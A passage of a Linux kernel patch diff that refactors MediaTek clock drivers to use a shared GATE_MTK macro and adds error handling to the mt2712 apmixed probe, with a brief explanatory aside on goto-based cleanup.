+diff --git a/drivers/clk/mediatek/clk-mt2701.c b/drivers/clk/mediatek/clk-mt2701.c
+index 9b442af37e672..1c3a93143dc5e 100644
+--- a/drivers/clk/mediatek/clk-mt2701.c
++++ b/drivers/clk/mediatek/clk-mt2701.c
+@@ -636,14 +636,8 @@ static const struct mtk_gate_regs top_aud_cg_regs = {
+ 	.sta_ofs = 0x012C,
+ };
+ 
+-#define GATE_TOP_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top_aud_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top_aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	GATE_TOP_AUD(CLK_TOP_AUD_48K_TIMING, "a1sys_hp_ck", "aud_mux1_div",
+@@ -701,14 +695,8 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x0048,
+ };
+ 
+-#define GATE_ICG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_ICG(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	GATE_ICG(CLK_INFRA_DBG, "dbgclk", "axi_sel", 0),
+@@ -822,23 +810,11 @@ static const struct mtk_gate_regs peri1_cg_regs = {
+ 	.sta_ofs = 0x001c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate peri_clks[] = {
+ 	GATE_PERI0(CLK_PERI_USB0_MCU, "usb0_mcu_ck", "axi_sel", 31),
+diff --git a/drivers/clk/mediatek/clk-mt2712-bdp.c b/drivers/clk/mediatek/clk-mt2712-bdp.c
+index 684d03e9f6de1..5e668651dd901 100644
+--- a/drivers/clk/mediatek/clk-mt2712-bdp.c
++++ b/drivers/clk/mediatek/clk-mt2712-bdp.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs bdp_cg_regs = {
+ 	.sta_ofs = 0x100,
+ };
+ 
+-#define GATE_BDP(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_BDP(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate bdp_clks[] = {
+ 	GATE_BDP(CLK_BDP_BRIDGE_B, "bdp_bridge_b", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-img.c b/drivers/clk/mediatek/clk-mt2712-img.c
+index 335049cdc856c..3ffa51384e6b2 100644
+--- a/drivers/clk/mediatek/clk-mt2712-img.c
++++ b/drivers/clk/mediatek/clk-mt2712-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_SMI_LARB2, "img_smi_larb2", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-jpgdec.c b/drivers/clk/mediatek/clk-mt2712-jpgdec.c
+index 07ba7c5e80aff..8c768d5ce24d5 100644
+--- a/drivers/clk/mediatek/clk-mt2712-jpgdec.c
++++ b/drivers/clk/mediatek/clk-mt2712-jpgdec.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs jpgdec_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_JPGDEC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &jpgdec_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_JPGDEC(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &jpgdec_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate jpgdec_clks[] = {
+ 	GATE_JPGDEC(CLK_JPGDEC_JPGDEC1, "jpgdec_jpgdec1", "jpgdec_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-mfg.c b/drivers/clk/mediatek/clk-mt2712-mfg.c
+index 42f8cf3ecf4cb..8949315c2dd20 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mfg.c
++++ b/drivers/clk/mediatek/clk-mt2712-mfg.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mfg_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_MFG(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mfg_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MFG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mfg_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mfg_clks[] = {
+ 	GATE_MFG(CLK_MFG_BG3D, "mfg_bg3d", "mfg_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-mm.c b/drivers/clk/mediatek/clk-mt2712-mm.c
+index 7d44b09b8a0a7..ad6daa8f28a83 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mm.c
++++ b/drivers/clk/mediatek/clk-mt2712-mm.c
+@@ -30,32 +30,14 @@ static const struct mtk_gate_regs mm2_cg_regs = {
+ 	.sta_ofs = 0x220,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM2(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt2712-vdec.c b/drivers/clk/mediatek/clk-mt2712-vdec.c
+index 6296ed5c5b555..572290dd43c87 100644
+--- a/drivers/clk/mediatek/clk-mt2712-vdec.c
++++ b/drivers/clk/mediatek/clk-mt2712-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x8,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	/* VDEC0 */
+diff --git a/drivers/clk/mediatek/clk-mt2712-venc.c b/drivers/clk/mediatek/clk-mt2712-venc.c
+index b9bfc35de629c..9588eb03016eb 100644
+--- a/drivers/clk/mediatek/clk-mt2712-venc.c
++++ b/drivers/clk/mediatek/clk-mt2712-venc.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_SMI_COMMON_CON, "venc_smi", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712.c b/drivers/clk/mediatek/clk-mt2712.c
+index 56980dd6c2eaf..d6c2cc183b1a1 100644
+--- a/drivers/clk/mediatek/clk-mt2712.c
++++ b/drivers/clk/mediatek/clk-mt2712.c
+@@ -958,23 +958,11 @@ static const struct mtk_gate_regs top1_cg_regs = {
+ 	.sta_ofs = 0x424,
+ };
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	/* TOP0 */
+@@ -998,14 +986,8 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x48,
+ };
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	GATE_INFRA(CLK_INFRA_DBGCLK, "infra_dbgclk", "axi_sel", 0),
+@@ -1035,32 +1017,14 @@ static const struct mtk_gate_regs peri2_cg_regs = {
+ 	.sta_ofs = 0x42c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PERI2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate peri_clks[] = {
+ 	/* PERI0 */
+@@ -1283,15 +1247,25 @@ static int clk_mt2712_apmixed_probe(struct platform_device *pdev)
+ 	struct device_node *node = pdev->dev.of_node;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_APMIXED_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+-	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
++	r = mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
++	if (r)
++		goto free_clk_data;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
++	if (r) {
++		dev_err(&pdev->dev, "Cannot register clock provider: %d\n", r);
++		goto unregister_plls;
++	}
+ 
+-	if (r != 0)
+-		pr_err("%s(): could not register clock provider: %d\n",
+-			__func__, r);
++	return 0;
+ 
++unregister_plls:
++	mtk_clk_unregister_plls(plls, ARRAY_SIZE(plls), clk_data);
++free_clk_data:
++	mtk_free_clk_data(clk_data);
+ 	return r;
+ }
+ 
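The mt2712 apmixed probe fix is the standard goto-unwind shape: check the allocation, propagate mtk_clk_register_plls() failures, and on a provider-registration failure unregister the PLLs and free the clk data in reverse order of setup. A self-contained sketch of that shape with stub steps (names illustrative, not the mtk API):

	#include <stdio.h>

	static int alloc_data(void)       { return 0; }
	static int register_plls(void)    { return 0; }
	static int add_provider(void)     { return 0; }
	static void unregister_plls(void) { puts("plls unregistered"); }
	static void free_data(void)       { puts("clk data freed"); }

	static int probe_sketch(void)
	{
		int r;

		if (alloc_data())
			return -1;		/* -ENOMEM in the driver */

		r = register_plls();
		if (r)
			goto free_out;

		r = add_provider();
		if (r)
			goto unregister;

		return 0;

	unregister:
		unregister_plls();		/* undo step 2 */
	free_out:
		free_data();			/* undo step 1 */
		return r;
	}

	int main(void)
	{
		return probe_sketch();
	}
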
+diff --git a/drivers/clk/mediatek/clk-mt6765-audio.c b/drivers/clk/mediatek/clk-mt6765-audio.c
+index 0aa6c0d352ca5..5682e0302eee2 100644
+--- a/drivers/clk/mediatek/clk-mt6765-audio.c
++++ b/drivers/clk/mediatek/clk-mt6765-audio.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs audio1_cg_regs = {
+ 	.sta_ofs = 0x4,
+ };
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate audio_clks[] = {
+ 	/* AUDIO0 */
+diff --git a/drivers/clk/mediatek/clk-mt6765-cam.c b/drivers/clk/mediatek/clk-mt6765-cam.c
+index 25f2bef38126e..6e7d192c19cb0 100644
+--- a/drivers/clk/mediatek/clk-mt6765-cam.c
++++ b/drivers/clk/mediatek/clk-mt6765-cam.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs cam_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_CAM(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &cam_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_CAM(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &cam_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate cam_clks[] = {
+ 	GATE_CAM(CLK_CAM_LARB3, "cam_larb3", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765-img.c b/drivers/clk/mediatek/clk-mt6765-img.c
+index a62303ef4f41d..cfbc907988aff 100644
+--- a/drivers/clk/mediatek/clk-mt6765-img.c
++++ b/drivers/clk/mediatek/clk-mt6765-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_LARB2, "img_larb2", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765-mipi0a.c b/drivers/clk/mediatek/clk-mt6765-mipi0a.c
+index 25c829fc38661..f2b9dc8084801 100644
+--- a/drivers/clk/mediatek/clk-mt6765-mipi0a.c
++++ b/drivers/clk/mediatek/clk-mt6765-mipi0a.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mipi0a_cg_regs = {
+ 	.sta_ofs = 0x80,
+ };
+ 
+-#define GATE_MIPI0A(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mipi0a_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_MIPI0A(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mipi0a_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate mipi0a_clks[] = {
+ 	GATE_MIPI0A(CLK_MIPI0A_CSR_CSI_EN_0A,
+diff --git a/drivers/clk/mediatek/clk-mt6765-mm.c b/drivers/clk/mediatek/clk-mt6765-mm.c
+index bda774668a361..a4570c9dbefa5 100644
+--- a/drivers/clk/mediatek/clk-mt6765-mm.c
++++ b/drivers/clk/mediatek/clk-mt6765-mm.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mm_cg_regs = {
+ 	.sta_ofs = 0x100,
+ };
+ 
+-#define GATE_MM(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM */
+diff --git a/drivers/clk/mediatek/clk-mt6765-vcodec.c b/drivers/clk/mediatek/clk-mt6765-vcodec.c
+index 2bc1fbde87da9..75d72b9b4032c 100644
+--- a/drivers/clk/mediatek/clk-mt6765-vcodec.c
++++ b/drivers/clk/mediatek/clk-mt6765-vcodec.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_SET0_LARB, "venc_set0_larb", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765.c b/drivers/clk/mediatek/clk-mt6765.c
+index e9b9e67297335..665981fc411f5 100644
+--- a/drivers/clk/mediatek/clk-mt6765.c
++++ b/drivers/clk/mediatek/clk-mt6765.c
+@@ -483,32 +483,14 @@ static const struct mtk_gate_regs top2_cg_regs = {
+ 	.sta_ofs = 0x320,
+ };
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_TOP2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	/* TOP0 */
+@@ -559,41 +541,17 @@ static const struct mtk_gate_regs ifr5_cg_regs = {
+ 	.sta_ofs = 0xc8,
+ };
+ 
+-#define GATE_IFR2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR3(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr3_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR4(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr4_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR4(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr4_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR5(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr5_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR5(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr5_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate ifr_clks[] = {
+ 	/* INFRA_TOPAXI */
+@@ -674,14 +632,8 @@ static const struct mtk_gate_regs apmixed_cg_regs = {
+ 	.sta_ofs = 0x14,
+ };
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &apmixed_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,		\
+-	}
++#define GATE_APMIXED(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &apmixed_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate apmixed_clks[] = {
+ 	/* AUDIO0 */
+diff --git a/drivers/clk/mediatek/clk-mt6797-img.c b/drivers/clk/mediatek/clk-mt6797-img.c
+index 7c6a53fbb8be6..06441393478f6 100644
+--- a/drivers/clk/mediatek/clk-mt6797-img.c
++++ b/drivers/clk/mediatek/clk-mt6797-img.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_FDVT, "img_fdvt", "mm_sel", 11),
+diff --git a/drivers/clk/mediatek/clk-mt6797-mm.c b/drivers/clk/mediatek/clk-mt6797-mm.c
+index 0846011fc8943..99a63f46642fa 100644
+--- a/drivers/clk/mediatek/clk-mt6797-mm.c
++++ b/drivers/clk/mediatek/clk-mt6797-mm.c
+@@ -23,23 +23,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {			\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &mm0_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr,		\
+-}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_MM1(_id, _name, _parent, _shift) {			\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
